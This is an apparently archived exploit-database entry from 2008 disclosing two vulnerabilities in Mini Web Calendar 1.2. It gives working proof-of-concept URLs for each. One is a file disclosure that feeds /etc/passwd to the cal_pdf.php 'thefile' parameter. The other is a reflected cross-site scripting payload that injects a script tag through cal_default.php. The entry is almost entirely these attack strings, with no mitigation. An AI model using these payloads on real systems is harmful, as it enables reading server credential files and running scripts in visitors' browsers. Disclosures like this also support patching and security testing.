id: 4122
date: 11/07/2008
title: Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities
author: ahmadbady
cves: 

====================================================================
Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities
====================================================================


************************(XSS / FD Vulnerability)**************

script:Mini Web Calendar, ver. 1.2
   
   
************************************************************************************************************
download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94
   
************************************************************************************************************


......................................................................................
local file xpl:
   
http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd

xss xpl:

http://www.site.com/mwcal/php/cal_default.php/>'><ScRiPt>alert(0)</ScRiPt>



***************************************************



#  0day.today [2023-03-22]  #